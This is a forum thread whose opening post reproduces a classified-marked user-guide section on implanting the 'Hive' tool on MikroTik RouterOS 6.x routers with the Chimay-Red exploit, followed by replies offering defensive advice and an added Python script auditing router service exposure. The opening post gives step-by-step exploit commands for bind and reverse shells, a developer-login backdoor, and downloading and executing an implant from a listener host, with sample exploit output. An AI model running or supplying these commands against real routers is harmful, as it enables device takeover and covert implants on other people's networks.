koutingshui posted on 2017-12-23 09:18:28

ROS is not secure, Installing Hive on MikroTik MIPS RouterOS 6.x




Installing Hive on MikroTik MIPS RouterOS 6.x using Chimay-Red
(S) MikroTik routers running version 6.x of RouterOS may be exploited using Chimay-Red. Examples
here use Chimay-Red version 4.7.1.
7.1.1 (S) Chimay Red Command Synopsis
chimay_red.py [-h] -t TARGET [-V] [-a ARCH] <command>
Options:
-h, --help                   show this help message and exit
-t TARGET, --target TARGET   Target machine address as <IP:PORT>
-V, --verbose                Verbose mode, print out debug and error messages
-a ARCH, --arch ARCH         Specify architecture (mipsbe, ppc, x86, tile)
Available commands are as follows:
Command                      Function
bindshell                    create a bindshell
connectback                  create a reverse shell
download_and_exe             connect back and download a file to then execute
ssl_download_and_exe         connect back and download a file via SSL to then execute
write_devel                  write "devel-login" file to allow developer account login
write_devel_read_userfile    in addition to enabling developer logins, read back the users file
custom                       custom shellcode
EXAMPLES
python chimay_red.py -V -t 192.168.88.1:80 bindshell -p 4242
python chimay_red.py -a ppc -t 192.168.88.1:80 connectback -l 192.168.88.2 -p 4242
SECRET//NOFORN//20401109 23
SECRET//NOFORN
(U) Appendix A: Operational Notes (U) Hive 2.9.1 User's Guide
python chimay_red.py -t 192.168.88.1:80 download_and_exe -l 192.168.88.2 -p 4242 -f /tmp/file.elf
python chimay_red.py -t 192.168.88.1:80 ssl_download_and_exe -l 192.168.88.2 -p 4242 -f /tmp/file.elf
7.1.2 (S) Obtaining Shell Access
(S) To obtain shell access to the router, direct Chimay-Red to an open port on the target address
(typically port 80, which is used for the admin GUI) using the write_devel command having the
following syntax:
python chimay_red.py -t <router address>:<open port> write_devel
(S) Example:
python chimay_red.py -t 192.168.88.1:80 write_devel
(S) Use telnet to access the device using the target address. At the login prompt enter devel,
followed by an empty line for the password (i.e. no password). You should receive a BusyBox banner
followed by the root prompt (#).
7.1.3 (S) Implanting Hive
(S) To implant Hive into the router, use download_and_exe_server.py found in the Chimay-Red tools
directory as a download server using the following syntax.
python download_and_exe_server.py -l <command/control address> \
    -p <listen port> -f <path to Hive binary>
(S) The command/control address is the host from which the target will obtain the Hive binary after
connecting to the associated listening port.
(S) Example:
python download_and_exe_server.py -l 10.6.5.200 -p 2000 \
    -f ~/hive/server/hivedmikrotikmipsPATCHED
(S) Once the server is listening, execute Chimay-Red using the following syntax.
python chimay_red.py -t <target address>:<port> download_and_exe \
    -l <listen address> -p <listen port> -f <filename path on the target>
(S) If all goes well, Chimay-Red will provide an indication of what it's doing and then ask you to
press ENTER to start the download of Hive. See the example below.
$ python ./chimay_red.py -t 10.6.5.71:80 download_and_exe \
    -l 10.6.5.200 -p 10000 -f /tmp/hivedmikrotikmipsPATCHED
[+] Connecting to: 10.6.5.71:80
[+] Detected RouterOS: 6.13
[+] Detected architecture: mipsbe
Start download_and_exe server on 10.6.5.200:2000, then press ENTER...
[+] 0 seconds until Web server is reset.
[+] Web server reset.
[+] Connecting to target...
[+] Connected.
[+] Sending exploit payload...
[+] Exploit sent.
$
(S) For additional information, please refer to the documentation provided with Chimay-Red.

ros

9939781 posted on 2017-12-23 11:01:58

192.168.88.1:80;P
All right, everyone just turn off the port 80 service, and we're done.

gaohz521 posted on 2017-12-23 12:26:05

Upgrade to the new version as soon as possible.

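xuxi3201 posted on 2017-12-23 13:03:22

This post was last edited by xuxi3201 on 2017-12-23 13:45

ROS comes with its own firewall. As long as your skill level is high enough, you can write any rule:
Beginner level: restrict which IPs may log in to the ROS management port;
Intermediate level: limit brute-force password cracking;
Higher level: drop the attack packets;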
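
An added example, not part of any post in this thread: a small audit of a RouterOS `/export` that checks the advice given above (turn off the port 80 service, or restrict which addresses can reach the management services). The function names and sample exports are constructed for illustration; it assumes a compact export that omits settings left at their defaults, treats a missing `www` or `telnet` entry as enabled and unrestricted, and does not look at firewall rules.

```python
import re

# Services named in this thread: the web GUI ("www", port 80) and telnet.
WATCHED = ("www", "telnet")

# Constructed sample exports (not taken from any real router).
SAMPLE_EXPOSED = """# constructed sample
/ip service
set ssh port=2222
set www address=0.0.0.0/0
"""
SAMPLE_RESTRICTED = """# constructed sample
/ip service
set telnet disabled=yes
set www address=192.168.88.0/24 \\
    port=8080
/ip firewall filter
add action=drop chain=input comment="constructed rule"
"""

def parse_ip_services(export_text):
    """Return {service: {property: value}} from the '/ip service' section."""
    text = re.sub(r"\\\r?\n\s*", "", export_text)  # join '\' line continuations
    services, in_section = {}, False
    for line in (l.strip() for l in text.splitlines()):
        if line.startswith("/"):
            in_section = line == "/ip service"
        elif in_section and (m := re.match(r"set\s+(\S+)\s*(.*)", line)):
            services[m.group(1)] = dict(re.findall(r'(\S+?)=("[^"]*"|\S+)', m.group(2)))
    return services

def audit(export_text):
    """List (service, reason) for watched services left open to every address."""
    services = parse_ip_services(export_text)
    findings = []
    for name in WATCHED:
        # Assumption: a service missing from the export is at its defaults,
        # i.e. enabled with no address restriction.
        props = services.get(name, {})
        if props.get("disabled") == "yes":
            continue
        allowed = [a for a in props.get("address", "").strip('"').split(",") if a]
        if not allowed or "0.0.0.0/0" in allowed:
            findings.append((name, "enabled and reachable from any address"))
    return findings

if __name__ == "__main__":
    for label, text in (("exposed", SAMPLE_EXPOSED), ("restricted", SAMPLE_RESTRICTED)):
        print(label, audit(text) or "no findings")
```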

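koutingshui posted on 2017-12-23 16:07:10

http://www.freebuf.com/news/132067.html is the original source. If the vendor doesn't deal with this, I reckon closing port 80 and using the firewall won't help.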

showname posted on 2017-12-30 02:44:03

02/02/2015 Release 2.8 TDR
03/03/2015 Release 2.8.1 TDR
07/15/2015 Release 2.9 TDR
11/09/2015 Release 2.9.1 TDR
This is something that had already started two years ago.